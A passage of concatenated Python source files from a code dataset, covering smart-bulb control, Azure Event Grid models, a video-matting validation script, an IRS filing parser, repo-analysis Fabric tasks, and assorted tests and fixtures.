self._debug("Setting brightness to {} with transition {} s".format(brightness, transition))
if brightness == 0:
self._debug("Really setting to off")
return self.off(zone)
if brightness == 255 and transition is None:
if 'has_max_brightness' in self._config['features']:
return self._max_brightness(zone)
brightness_min = self._config['brightness_range'][0]
brightness_max = self._config['brightness_range'][1]
brightness = self._scale_int(brightness, 1, 255, self._config['brightness_range'][0], self._config['brightness_range'][1])
if 'can_set_brightness' in self._config['features']:
return self._set_brightness(brightness, zone, transition)
else:
return self._step_brightness(brightness, brightness_min, brightness_max, zone, transition)
def set_color(self, rgb, zone = None):
# Compute the color value from the RGB value
value = self._rgb_to_color(rgb)
# If the color selected is really a shade of grey, turn the
# bulbs white at that brightness
if value < 0:
brightness = (value + 1) * -1
self._debug("Brightness = {}".format(brightness))
if self.white(zone):
return self.set_brightness(brightness, zone)
else:
return False
# If the bulbs do not support color, nothing needs to be done
if 'has_color' not in self._config['features']:
return False
# Press the correct color button
if zone is None:
message = {'button': 'set_color'}
else:
message = {'button': 'zone_set_color', 'zone': zone}
message['color'] = value
# Press the button
return self._send_button(message)
def set_temperature(self, kelvins, zone = None):
if 'has_temperature' not in self._config['features']:
return False
temperature_input_coldest = self._config['temperature_input_range'][0] # e.g. 6500
temperature_input_warmest = self._config['temperature_input_range'][1] # e.g. 3000
temperature_output_coldest = self._config['temperature_output_range'][0] # e.g. 0
temperature_output_warmest = self._config['temperature_output_range'][1] # e.g. 9
# If there is only one supported color temperature, we are already at that temperature
# Make no adjustment to the temperature to account for small variances
if temperature_input_coldest == temperature_input_warmest:
return True
# Clamp the color temperature to something this remote supports
if kelvins < temperature_input_warmest:
kelvins = temperature_input_warmest
elif kelvins > temperature_input_coldest:
kelvins = temperature_input_coldest
temperature = self._scale_int(kelvins, temperature_input_coldest, temperature_input_warmest, temperature_output_coldest, temperature_output_warmest)
self._debug("Scaled kelvins={} to a temperature value of {}".format(kelvins, temperature))
if 'can_set_temperature' in self._config['features']:
return self._set_temperature(temperature, zone)
else:
return self._step_temperature(temperature, temperature_output_coldest, temperature_output_warmest, zone)
def on(self, zone = None, try_hard = False):
if zone is None:
message = {'button': 'on'}
else:
message = {
'button': 'zone_on',
'zone': zone
}
# Increase retries and delay for on/off to ensure
# that these important messages are delivered
if try_hard:
message['retries'] = self._config['retries'] * 2
message['delay'] = self._config['delay'] * 2
return self._send_button(message)
def off(self, zone = None, dim = True, try_hard = False):
# Dim the bulbs so that when turned on they are not bright
if dim:
self.set_brightness(1, zone)
if zone is None:
message = {
'button': 'off',
}
else:
message = {
'button': 'zone_off',
'zone': zone
}
# Increase retries and delay for on/off to ensure
# that these important messages are delivered
if try_hard:
message['retries'] = self._config['retries'] * 2
message['delay'] = self._config['delay'] * 2
return self._send_button(message)
def night(self, zone = None):
# If the bulbs do not support night, nothing needs to be done
if 'has_night' not in self._config['features']:
return False
if zone is None:
message = {'button': 'night'}
else:
message = {
'button': 'zone_night',
'zone': zone
}
return self._send_button(message)
def white(self, zone = None):
# If the bulbs are already white, nothing needs to be done
if 'is_white' in self._config['features']:
return True
# If the bulbs do not support white, nothing needs to be done
if 'has_white' not in self._config['features']:
return False
if zone is None:
message = {'button': 'white'}
else:
message = {
'button': 'zone_white',
'zone': zone
}
return self._send_button(message)
# Methods to query remote identity and state
def get_zone_ids(self):
return self._config.get('zones', [1, 2, 3, 4])
def get_type(self):
return self._type
def get_id(self):
return self._id
def get_message_id(self):
return self._message_id
def get_brightness_range(self):
# Brightness is always a fixed range
return [0, 255]
def get_temperature_range(self):
# If the remote has no control over the temperature this
# query gets a null response
return self._config.get('temperature_input_range', None)
| StarcoderdataPython |
9604434 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint:disable=protected-access
from typing import Optional
from msrest.serialization import UTC
import datetime as dt
import uuid
import json
from ._generated import models
from ._generated.models import StorageBlobCreatedEventData, \
EventGridEvent as InternalEventGridEvent, \
CloudEvent as InternalCloudEvent
from ._shared.mixins import DictMixin
from ._event_mappings import _event_mappings
class CloudEvent(InternalCloudEvent): #pylint:disable=too-many-instance-attributes
"""Properties of an event published to an Event Grid topic using the CloudEvent 1.0 Schema.
All required parameters must be populated in order to send to Azure.
:param source: Required. Identifies the context in which an event happened. The combination of id and source must be
unique for each distinct event. If publishing to a domain topic, source must be the domain name.
:type source: str
:param data: Event data specific to the event type.
:type data: object
:param type: Required. Type of event related to the originating occurrence.
:type type: str
:param time: The time (in UTC) the event was generated, in RFC3339 format.
:type time: ~datetime.datetime
:param dataschema: Identifies the schema that data adheres to.
:type dataschema: str
:param datacontenttype: Content type of data value.
:type datacontenttype: str
:param subject: This describes the subject of the event in the context of the event producer
(identified by source).
:type subject: str
:param id: Optional. An identifier for the event. The combination of id and source must be
unique for each distinct event.
:type id: Optional[str]
"""
_validation = {
'source': {'required': True},
'type': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'id': {'key': 'id', 'type': 'str'},
'source': {'key': 'source', 'type': 'str'},
'data': {'key': 'data', 'type': 'object'},
'data_base64': {'key': 'data_base64', 'type': 'bytearray'},
'type': {'key': 'type', 'type': 'str'},
'time': {'key': 'time', 'type': 'iso-8601'},
'specversion': {'key': 'specversion', 'type': 'str'},
'dataschema': {'key': 'dataschema', 'type': 'str'},
'datacontenttype': {'key': 'datacontenttype', 'type': 'str'},
'subject': {'key': 'subject', 'type': 'str'},
}
def __init__(self, source, type, **kwargs):
# type: (str, str, Any) -> None
kwargs.setdefault('id', uuid.uuid4())
kwargs.setdefault("source", source)
kwargs.setdefault("type", type)
kwargs.setdefault("time", dt.datetime.now(UTC()).isoformat())
kwargs.setdefault("specversion", "1.0")
super(CloudEvent, self).__init__(**kwargs)
class EventGridEvent(InternalEventGridEvent):
"""Properties of an event published to an Event Grid topic using the EventGrid Schema.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param topic: The resource path of the event source. If not provided, Event Grid will stamp onto the event.
:type topic: str
:param subject: Required. A resource path relative to the topic path.
:type subject: str
:param data: Event data specific to the event type.
:type data: object
:param event_type: Required. The type of the event that occurred.
:type event_type: str
:ivar metadata_version: The schema version of the event metadata. If provided, must match Event Grid Schema exactly.
If not provided, EventGrid will stamp onto event.
:vartype metadata_version: str
:param data_version: The schema version of the data object. If not provided, will be stamped with an empty value.
:type data_version: str
:param id: Optional. An identifier for the event. The combination of id and source must be
unique for each distinct event.
:type id: Optional[str]
:param event_time: Optional.The time (in UTC) of the event. If not provided, it will be the time (in UTC) the event was generated.
:type event_time: Optional[~datetime.datetime]
"""
_validation = {
'id': {'required': True},
'subject': {'required': True},
'data': {'required': True},
'event_type': {'required': True},
'event_time': {'required': True},
'metadata_version': {'readonly': True},
'data_version': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'topic': {'key': 'topic', 'type': 'str'},
'subject': {'key': 'subject', 'type': 'str'},
'data': {'key': 'data', 'type': 'object'},
'event_type': {'key': 'eventType', 'type': 'str'},
'event_time': {'key': 'eventTime', 'type': 'iso-8601'},
'metadata_version': {'key': 'metadataVersion', 'type': 'str'},
'data_version': {'key': 'dataVersion', 'type': 'str'},
}
def __init__(self, subject, event_type, **kwargs):
# type: (str, str, Any) -> None
kwargs.setdefault('id', uuid.uuid4())
kwargs.setdefault('subject', subject)
kwargs.setdefault("event_type", event_type)
kwargs.setdefault('event_time', dt.datetime.now(UTC()).isoformat())
kwargs.setdefault('data', None)
super(EventGridEvent, self).__init__(**kwargs)
class DeserializedEvent():
"""The container for the deserialized event model and mapping of event envelope properties.
:param dict event: dict
"""
def __init__(self, event):
# type: (Any) -> None
self._model = None
self._event_dict = event
def to_json(self):
# type: () -> dict
return self._event_dict
@property
def model(self):
# type: () -> Union[CloudEvent, EventGridEvent]
"""
Returns strongly typed EventGridEvent/CloudEvent object defined by the format of the properties.
All properties of the model are strongly typed (ie. for an EventGridEvent, event_time property will return a datetime.datetime object).
model.data: Returns a system event type(StorageBlobCreated, StorageBlobDeleted, etc.). If model.type/model.event_type is not defined in the
system registry, returns None.
:raise: :class:`ValueError`, when events do not follow CloudEvent or EventGridEvent schema.
:rtype: Union[CloudEvent, EventGridEvent]
"""
if not self._model:
try:
if 'specversion' in self._event_dict.keys():
self._model = CloudEvent.deserialize(self._event_dict)
event_type = self._model.type
else:
self._model = EventGridEvent.deserialize(self._event_dict)
event_type = self._model.event_type
except:
raise ValueError("Event is not correctly formatted CloudEvent or EventGridEvent.")
self._deserialize_data(event_type)
return self._model
def _deserialize_data(self, event_type):
"""
Sets self._model.data to strongly typed event object if event type exists in _event_mappings.
Otherwise, sets self._model.data to None.
:param str event_type: The event_type of the EventGridEvent object or the type of the CloudEvent object.
"""
# if system event type defined, set model.data to system event object
try:
self._model.data = (_event_mappings[event_type]).deserialize(self._model.data)
except KeyError: # else, if custom event, then model.data is dict and should be set to None
self._model.data = None
class CustomEvent(DictMixin):
"""The wrapper class for a CustomEvent, to be used when publishing events.
:param dict args: dict
"""
def __init__(self, *args, **kwargs):
# type: (Any, Any) -> None
self._update(*args, **kwargs)
def _update(self, *args, **kwargs):
for k, v in dict(*args, **kwargs).items():
self[k] = v
| StarcoderdataPython |
9641112 | <filename>validate.py
"""
Validation
Implemented by <NAME>
"""
import argparse
import os
import torch
from torch.utils.data import DataLoader
from torchvision import utils as v_utils
from tqdm import tqdm
from data_path import DATA_PATH
from dataset.augmentation import ValidFrameSampler, ValidAugmentation
from dataset.video_matte import VideoMatte240KDataset
from model import MattingBase
from model.utils import load_matched_state_dict
# --------------- Arguments ---------------
parser = argparse.ArgumentParser()
parser.add_argument('--dataset-name', type=str, default='videomatte8k', choices=DATA_PATH.keys())
parser.add_argument('--model-backbone', type=str, default='resnet50', choices=['resnet50'])
parser.add_argument('--model-checkpoint', type=str, default=r'<path to checkpoint>')
parser.add_argument('--output-path', type=str, default=r'<path to output>')
parser.add_argument('--seq-length', type=int, default=1)
parser.add_argument('--num-workers', type=int, default=0)
args = parser.parse_args()
# --------------- Loading ---------------
dataset_valid = VideoMatte240KDataset(
video_matte_path=DATA_PATH[args.dataset_name]['valid'],
background_image_path=DATA_PATH['backgrounds']['valid'],
seq_length=args.seq_length,
seq_sampler=ValidFrameSampler(),
transform=ValidAugmentation((224, 224)),
background_image_id=142
)
dataloader_valid = DataLoader(
dataset_valid,
pin_memory=False,
batch_size=1,
num_workers=args.num_workers
)
# Model
model = MattingBase(args.model_backbone).cuda()
load_matched_state_dict(model, torch.load(args.model_checkpoint))
model.eval()
# Validate
def save_img_tensor_list(t, start_index, output_dir):
output_path = os.path.join(args.output_path, output_dir)
os.makedirs(output_path, exist_ok=True)
index = start_index
for img in t[0]:
v_utils.save_image(img, os.path.join(output_path, f'{index:06d}.png'))
index += 1
os.makedirs(args.output_path, exist_ok=True)
with torch.no_grad():
for i, (fgr, pha, bgr) in enumerate(tqdm(dataset_valid)):
true_fgr = fgr.unsqueeze(0).cuda(non_blocking=True)
true_bgr = bgr.unsqueeze(0).cuda(non_blocking=True)
true_pha = pha.unsqueeze(0).cuda(non_blocking=True)
true_src = true_bgr.clone()
true_src = true_fgr * true_pha + true_src * (1 - true_pha)
pred_pha, pred_fgr, pred_err = model(true_src)[:3]
state = model.decoder.state3
index_start = i * args.seq_length
for i in range(state[0][0].size()[1]):
save_img_tensor_list(state[0][0][:, i, :, :].unsqueeze(0), index_start, f'state_h_{i}')
save_img_tensor_list(state[0][1][:, i, :, :].unsqueeze(0), index_start, f'state_c_{i}')
save_img_tensor_list(pred_pha, index_start, 'pred_pha')
save_img_tensor_list(true_pha, index_start, 'true_pha')
save_img_tensor_list(pred_err, index_start, 'pred_err')
save_img_tensor_list(true_src, index_start, 'true_src')
| StarcoderdataPython |
90860 | # Copyright 2017 <NAME>.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
PARTITIONS = 200
import sys
from lxml import etree
from schema import *
from lookup import SingletonLookup, MultiLookup
from cred import Credentials
from pyspark import SparkContext
cr = Credentials()
sc = SparkContext()
def append(elements, element):
if element == None:
return
elements.append(element)
def extend(elements, element):
if element == None:
return
elements.extend(element)
def makeSession():
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
engineStr = cr.getEngineStr()
engine = create_engine(engineStr)
Session = sessionmaker()
Session.configure(bind=engine)
session = Session()
return session
# Records are loaded transactionally, so we can ignore anything that has part I
def hasPartOne(filing, session):
n = session.query(PartI)\
.filter(PartI.filing == filing)\
.count()
return (n > 0)
def parseFilings(filings):
session = makeSession()
for filing in filings:
try:
if (hasPartOne(filing, session)):
#print "Skipping filing %s because already processed" % str(filing.id)
continue
raw = session.query(RawXML)\
.filter(RawXML.filing == filing)[0]
elements = []
sLookup = SingletonLookup(session, raw)
mLookup = MultiLookup(session, raw)
append(elements, Header(sLookup, filing))
append(elements, PartI(sLookup, filing))
extend(elements, iii(mLookup, filing))
append(elements, PartIV(sLookup, filing))
append(elements, PartVI(sLookup, filing))
extend(elements, vii(mLookup, filing))
append(elements, PartVIII(sLookup, filing))
append(elements, PartIX(sLookup, filing))
append(elements, PartX(sLookup, filing))
append(elements, PartXII(sLookup, filing))
extend(elements, g1(mLookup, filing))
extend(elements, l2(mLookup, filing))
for element in elements:
session.add(element)
session.commit()
except:
session.rollback()
session.close()
session = makeSession()
continue
session.close()
session = makeSession()
filings = session.query(Filing)\
.filter(Filing.FormType == "990")\
.filter(Filing.URL != None)\
.filter(Filing.raw != None)
session.close()
sc.parallelize(filings, PARTITIONS)\
.foreachPartition(parseFilings)
| StarcoderdataPython |
1903464 | <filename>WebMirror/management/rss_parser_funcs/feed_parse_extractBarnnnBlogspotCom.py
def extractBarnnnBlogspotCom(item):
'''
Parser for 'barnnn.blogspot.com'
'''
if 'Voice Drama' in item['tags']:
return None
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
if 'Lower Bound Volume' in item['title'] and vol is None:
vol = 2
if 'Upper Bound Volume' in item['title'] and vol is None:
vol = 1
tagmap = [
('yuri in which the world will end in ten days', 'yuri in which the world will end in ten days', 'translated'),
('Monster Hunter: Cross Soul', 'Monster Hunter: Cross Soul', 'translated'),
('The Girl Who Ate The Death God', 'The Girl Who Ate The Death God', 'translated'),
('kino\'s journey', 'Kino\'s Journey', 'translated'),
('Cross Road', 'Cross Road: In Their Cases', 'translated'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False | StarcoderdataPython |
6584590 | <reponame>learningequality/sushi-chef-content-automation-scripts
import functools
import json
import os
import requirements
import tempfile
import xmlrpc.client
from fabric.api import env, task, local
from fabric.colors import red, green, blue, yellow
from fabric.context_managers import hide, lcd
from fabric.utils import puts
from .github import get_chef_repos
class FabricException(Exception): # Generic Exception for using Fabric Errors
pass
env.abort_exception = FabricException
# LOCAL CHEF REPOS CHECKOUT
################################################################################
CHEF_REPOS_DIR = 'chefrepos'
if not os.path.exists(CHEF_REPOS_DIR):
os.mkdir(CHEF_REPOS_DIR)
# A dict of header --> attrpath associations to use when printing the report
REPORT_FIELDS_TO_PRINT = {
'repo_name': 'repo_name',
'branch': 'branch',
'requirements.txt': 'requirements_check.verdict',
'sushichef.py': 'sushichef_check.verdict',
'pyfiles': 'cloc_data.Python.nFiles',
'pyLOC': 'cloc_data.Python.code',
'md': 'cloc_data.Markdown.code',
'Bash': 'cloc_data.Bourne Shell.code',
'js': 'cloc_data.JavaScript.code',
'JSON': 'cloc_data.JSON.code',
'HTML': 'cloc_data.HTML.code',
'CSS': 'cloc_data.CSS.code',
# 'Comments': manually added containing combined comments from all reports
}
# CODE REPORTS
################################################################################
@task
def analyze_chef_repo(nickname, repo_name=None, organization='learningequality', branch='master', printing=True):
"""
Ruch chef repo convention checks and count LOC for a given chef repo.
"""
if repo_name is None:
repo_name = 'sushi-chef-' + nickname
chef_repo_dir = os.path.join(CHEF_REPOS_DIR, repo_name)
if not os.path.exists(chef_repo_dir):
local_setup_chef(None, repo_name=repo_name, organization=organization, branch=branch)
else:
local_update_chef(None, repo_name=repo_name, branch=branch)
# The "report" for the chef repo is a dict of checks and data
report = {
'repo_name': repo_name,
'branch': branch,
}
# requirements.txt report
requirements_check = check_requirements_txt(repo_name, branch=branch)
report['requirements_check'] = requirements_check
# sushichef.py report
sushichef_check = check_sushichef_py(repo_name, branch=branch)
report['sushichef_check'] = sushichef_check
# cloc
cloc_data = run_cloc_in_repo(repo_name)
report['cloc_data'] = cloc_data
if printing:
print_code_reports([report])
return report
@task
def analyze_chef_repos(allbranches=False):
"""
Ruch chef repo convention checks on all repos (based on local code checkout).
"""
allbranches = (allbranches and allbranches.lower() == 'true')
chef_repos = get_chef_repos()
reports = []
for i, chef_repo in enumerate(chef_repos):
organization = chef_repo.owner.login
repo_name = chef_repo.name
if allbranches:
branches = list(chef_repo.get_branches())
for branch in branches:
report = analyze_chef_repo(None, repo_name=repo_name, organization=organization, branch=branch.name, printing=False)
reports.append(report)
else:
report = analyze_chef_repo(None, repo_name=repo_name, organization=organization, branch='master', printing=False)
reports.append(report)
print_code_reports(reports)
# CHEF REPO CONVENTION CHECKS
################################################################################
def check_requirements_txt(repo_name, branch='master'):
"""
Check if repo contains a file `requirements.txt` and if ricecooker version
in it is up to date.
"""
chef_repo_dir = os.path.join(CHEF_REPOS_DIR, repo_name)
requirements_txt = os.path.join(chef_repo_dir, 'requirements.txt')
if not os.path.exists(requirements_txt):
return {'verdict':'❌'}
else:
# get the latest version of ricecooker from PyPI
pypi = xmlrpc.client.ServerProxy('https://pypi.python.org/pypi')
latest_ricecooker_version = pypi.package_releases('ricecooker')[0]
# compare with version in requirements.txt
with open(requirements_txt, 'r') as reqsf:
found = False
for req in requirements.parse(reqsf):
if req.name.lower() == 'ricecooker':
found = True
if not req.specs:
return {'verdict':'✅ *'} # not pinned so will be latest
else:
reln, version = req.specs[0] # we assume only one spec
if reln == '==':
if version == latest_ricecooker_version:
return {'verdict': '✅'} # latest and greatest
if version != latest_ricecooker_version:
return {
'verdict': version + ' ⬆️', # needs upgrade
'comment': 'Ricecooker needs to be updated',
}
else:
return {'verdict':'✅ >='} # >= means is latest
if not found:
return {'verdict':'❌'}
def check_sushichef_py(repo_name, branch='master'):
"""
Check if the chef repo contains a file called `sushichef.py` and also report
on other python files found in the repo.
"""
chef_repo_dir = os.path.join(CHEF_REPOS_DIR, repo_name)
all_files = os.listdir(chef_repo_dir)
py_files = [f for f in all_files if f.endswith('.py')]
subreport = {}
if 'sushichef.py' in py_files:
subreport['verdict'] = '✅'
py_files.remove('sushichef.py')
else:
subreport['verdict'] = '❌'
if py_files:
subreport['comment'] = 'Python files: ' + ', '.join(py_files)
return subreport
# REPORT HELPERS
################################################################################
def rget(dict_obj, attrpath):
"""
A fancy version of `get` that allows getting dot-separated nested attributes
like `license.license_name` for use in tree comparisons attribute mappings.
This code is inspired by solution in https://stackoverflow.com/a/31174427.
"""
def _getnoerrors(dict_obj, attr):
"""
Like regular get but will no raise if `dict_obj` is None.
"""
if dict_obj is None:
return None
return dict_obj.get(attr)
return functools.reduce(_getnoerrors, [dict_obj] + attrpath.split('.'))
def print_code_reports(reports):
"""
Print a table with the attributes REPORT_FIELDS_TO_PRINT from the `report`s.
"""
# 0. compute max length of each column so that the table will look nice
max_lens = {}
for header, attrpath in REPORT_FIELDS_TO_PRINT.items():
lens = [len(header)]
for report in reports:
val = rget(report, attrpath)
val_str = str(val) if val else ''
lens.append(len(val_str))
max_lens[header] = max(lens)
# 1. print header line
header_strs = []
for header in REPORT_FIELDS_TO_PRINT.keys():
max_len = max_lens[header]
header_str = header.ljust(max_len)
header_strs.append(header_str)
header_strs.append('Comments')
print('\t'.join(header_strs))
# 2. print report lines
for report in reports:
# extract comments from any subreports
comments = []
for subreport in report.values():
if 'comment' in subreport:
comments.append(subreport['comment'])
combined_comments = '; '.join(comments)
report_strs = []
for header, attrpath in REPORT_FIELDS_TO_PRINT.items():
max_len = max_lens[header]
val = rget(report, attrpath)
val_str = str(val) if val else ''
report_str = val_str.ljust(max_len)
if '⬆️' in report_str:
report_str += ' '
report_strs.append(report_str)
report_strs.append(combined_comments)
print('\t'.join(report_strs))
# CODE ANALYSIS
################################################################################
def run_cloc_in_repo(repo_name):
try:
with hide('running', 'stdout', 'stderr'):
local('which cloc')
except FabricException:
puts(red('command line tool cloc not found. Please install cloc.'))
return
chef_repo_dir = os.path.join(CHEF_REPOS_DIR, repo_name)
# json tempfile file to store cloc output
with tempfile.NamedTemporaryFile(suffix='.json') as tmpf:
with lcd(chef_repo_dir), hide('running', 'stdout', 'stderr'):
local('cloc --exclude-dir=venv . --json > ' + tmpf.name)
with open(tmpf.name) as jsonf:
cloc_data = json.load(jsonf)
return cloc_data
# LOCAL CHEF SETUP
################################################################################
@task
def local_setup_chef(nickname, repo_name=None, cwd=None, organization='learningequality', branch='master'):
"""
Locally git-clone the repo `sushi-chef-{nickname}` to the dir `chefrepos/`.
"""
if repo_name is None:
repo_name = 'sushi-chef-' + nickname
chef_repo_dir = os.path.join(CHEF_REPOS_DIR, repo_name)
github_ssh_url = 'git@github.com:{}/{}.git'.format(organization, repo_name)
if os.path.exists(chef_repo_dir):
puts(yellow('Chef repo dir ' + chef_repo_dir + ' already exists.'))
puts(yellow('You can use `local_update_chef` task to update code.'))
return
# clone the repo
with lcd(CHEF_REPOS_DIR):
local('git clone --quiet ' + github_ssh_url)
# checkout the desired branch
with lcd(chef_repo_dir):
local('git checkout ' + branch)
puts(green('Setup code from ' + github_ssh_url + ' in ' + chef_repo_dir))
@task
def local_unsetup_chef(nickname, repo_name=None):
"""
Remove the local repo `chefrepos/sushi-chef-{nickname}`.
"""
if repo_name is None:
repo_name = 'sushi-chef-' + nickname
chef_repo_dir = os.path.join(CHEF_REPOS_DIR, repo_name)
if os.path.exists(chef_repo_dir):
local('rm -rf ' + chef_repo_dir)
puts(green('Removed chef directory ' + chef_repo_dir))
else:
puts(yellow('Directory ' + chef_repo_dir + ' does not exist.'))
@task
def local_update_chef(nickname, repo_name=None, cwd=None, branch='master'):
"""
Run pull -f in the local chef repo to update the code to the lastest version.
"""
if repo_name is None:
repo_name = 'sushi-chef-' + nickname
chef_repo_dir = os.path.join(CHEF_REPOS_DIR, repo_name)
puts(green('Updating ' + chef_repo_dir + ' to branch ' + branch))
with lcd(chef_repo_dir), hide('running', 'stdout', 'stderr'):
local('git fetch origin ' + branch)
local('git checkout ' + branch)
local('git reset --hard origin/' + branch)
| StarcoderdataPython |
3476301 | from unittest import TestCase
from services.textrank import _word_graph, _sentence_graph
_sentences = [
['Every', 'breath', 'you', 'take'],
['Every', 'move', 'you', 'make'],
['Every', 'bond', 'you', 'break'],
['Every', 'step', 'you', 'take'],
['I', 'll', 'be', 'watching', 'you']
]
class TestGraphCreation(TestCase):
def test_word_graph(self):
g = _word_graph(_sentences)
self.assertEqual(len(g.nodes), 13)
self.assertEqual(
set(g.neighbors('Every')),
{'bond', 'break', 'breath', 'make', 'move', 'step', 'take', 'you'}
)
def test_sentence_graph(self):
g = _sentence_graph(_sentences)
self.assertEqual(len(g.nodes), 5)
self.assertEqual(
set(g.edges),
{(0, 1), (0, 2), (0, 3), (0, 4), (1, 2), (1, 3), (1, 4), (2, 3), (2, 4), (3, 4)}
) | StarcoderdataPython |
8099664 | from plex import Plex
from tests.core.helpers import read
import responses
# Set client configuration defaults
Plex.configuration.defaults.server(host='mock')
@responses.activate
def test_get_all():
responses.add(
responses.GET, 'http://mock:32400/:/prefs',
body=read('fixtures/prefs.xml'), status=200,
content_type='application/xml'
)
container = Plex[':/prefs'].get()
assert container is not None
items = list(container)
assert len(items) == 3
# Validate preferences
assert items[0].id == "FriendlyName"
assert items[0].group == 'general'
assert items[1].id == "collectUsageData"
assert items[1].group == 'general'
assert items[2].id == "FSEventLibraryUpdatesEnabled"
assert items[2].group == 'library'
@responses.activate
def test_get_single():
responses.add(
responses.GET, 'http://mock:32400/:/prefs',
body=read('fixtures/prefs.xml'), status=200,
content_type='application/xml'
)
item = Plex[':/prefs'].get('FriendlyName')
assert item is not None
# Validate preferences
assert item.id == "FriendlyName"
assert item.group == 'general'
@responses.activate
def test_set():
responses.add(
responses.PUT, 'http://mock:32400/:/prefs',
body='', status=200,
content_type='application/xml'
)
Plex[':/prefs'].set('FriendlyName', 'Mock Server')
assert len(responses.calls) == 1
| StarcoderdataPython |
5175653 | <reponame>webclinic017/koapy
from koapy.backend.kiwoom_open_api_plus.core.KiwoomOpenApiPlusTypeLibSpec import (
DISPATCH_CLSID,
EVENT_CLSID,
TYPELIB_SPEC,
)
from koapy.utils.pywin32 import BuildOleItems, LoadTypeLib
TYPELIB = LoadTypeLib(TYPELIB_SPEC)
OLE_ITEMS, ENUM_ITEMS, RECORD_ITEMS, VTABLE_ITEMS = BuildOleItems(TYPELIB_SPEC, TYPELIB)
DISPATCH_OLE_ITEM = OLE_ITEMS.get(DISPATCH_CLSID)
EVENT_OLE_ITEM = OLE_ITEMS.get(EVENT_CLSID)
| StarcoderdataPython |
6440095 | <gh_stars>0
import pytest
from modules.feedback.models import Feedback, FeedbackScoreField, FeedbackField
from modules.statistics.models.utils.update_users_statistics import update_user_stats
from modules.packages.models import Package, MissionPackages
from tasks.consts import IN_PROGRESS, VERIFICATION, FINISHED
from tasks.controllers.annotation_controller import AnnotationController
from tasks.models import (
Mission, Task, Item, ItemTemplate, ItemTemplateField, Annotation)
from users.models import EndWorker
from modules.order_strategy.models import Strategy
def add_annotation(item, user, value):
return Annotation.objects.create(item=item, user=user,
data={"output": value})
@pytest.fixture
@pytest.mark.django_db
def user1():
user = EndWorker.objects.create_superuser("<EMAIL>", "password", username="user1")
return user
@pytest.fixture
@pytest.mark.django_db
def user2():
user = EndWorker.objects.create_superuser("<EMAIL>", "password", username="user2")
return user
@pytest.fixture
@pytest.mark.django_db
def tasks():
Strategy.register_values()
strategy = Strategy.objects.get(name="StaticStrategyLogic")
mission1 = Mission.objects.create(name="Test mission 1")
mission2 = Mission.objects.create(name="Test mission 2")
mission3 = Mission.objects.create(name="Test mission 2")
mission1_package = MissionPackages.objects.create(mission=mission1, strategy=strategy, max_annotations=10)
mission2_package = MissionPackages.objects.create(mission=mission2, strategy=strategy, max_annotations=10)
mission3_package = MissionPackages.objects.create(mission=mission3, strategy=strategy, max_annotations=10)
Task.objects.create(mission=mission1, name="Task 1", strategy=strategy)
Task.objects.create(mission=mission1, name="Task 2", strategy=strategy)
Task.objects.create(mission=mission1, name="Task 3", strategy=strategy)
Task.objects.create(mission=mission2, name="Task 4", strategy=strategy)
Task.objects.create(mission=mission2, name="Task 5", strategy=strategy)
Task.objects.create(mission=mission3, name="Task 6", strategy=strategy)
Package.objects.create(name="Package 1", parent=mission1_package)
Package.objects.create(name="Package 2", parent=mission1_package)
Package.objects.create(name="Package 3", parent=mission1_package, status=IN_PROGRESS)
Package.objects.create(name="Package 4", parent=mission1_package, status=VERIFICATION)
Package.objects.create(name="Package 5", parent=mission1_package, status=FINISHED)
Package.objects.create(name="Package 6", parent=mission1_package, status=FINISHED)
Package.objects.create(name="Package 7", parent=mission2_package)
Package.objects.create(name="Package 8", parent=mission2_package)
Package.objects.create(name="Package 9", parent=mission2_package)
Package.objects.create(name="Package 10", parent=mission2_package, status=IN_PROGRESS)
Package.objects.create(name="Package 11", parent=mission3_package, status=VERIFICATION)
Package.objects.create(name="Package 12", parent=mission3_package, status=FINISHED)
Package.objects.create(name="Package 13", parent=mission3_package, status=FINISHED)
@pytest.fixture
@pytest.mark.django_db
def tasks_items(tasks):
task1 = Task.objects.get(name="Task 1")
task4 = Task.objects.get(name="Task 4")
template = ItemTemplate.objects.create(name="Test template")
first_field = ItemTemplateField.objects.create(name="first", widget="TextLabel")
template.fields.add(first_field)
annotation_field = ItemTemplateField.objects.create(name="output", widget="TextLabel",
required=True, editable=True)
template.fields.add(annotation_field)
for i, document in enumerate(task1.mission.packages.packages.all()):
Item.objects.create(task=task1, template=template, order=i,
data={first_field.name: i}, package=document)
for i, document in enumerate(task4.mission.packages.packages.all()):
Item.objects.create(task=task4, template=template, order=i,
data={first_field.name: i}, package=document)
@pytest.fixture
@pytest.mark.django_db
def tasks_annotations():
data = [[0, 0, 0, 0, 14],
[0, 0, 0, 12, 2],
[0, 0, 0, 8, 6],
[0, 3, 9, 2, 0],
[0, 0, 12, 1, 1],
[12, 2, 0, 0, 0],
[3, 10, 1, 0, 0],
[14, 0, 0, 0, 0],
[10, 0, 2, 2, 0],
[0, 0, 13, 0, 1]]
Strategy.register_values()
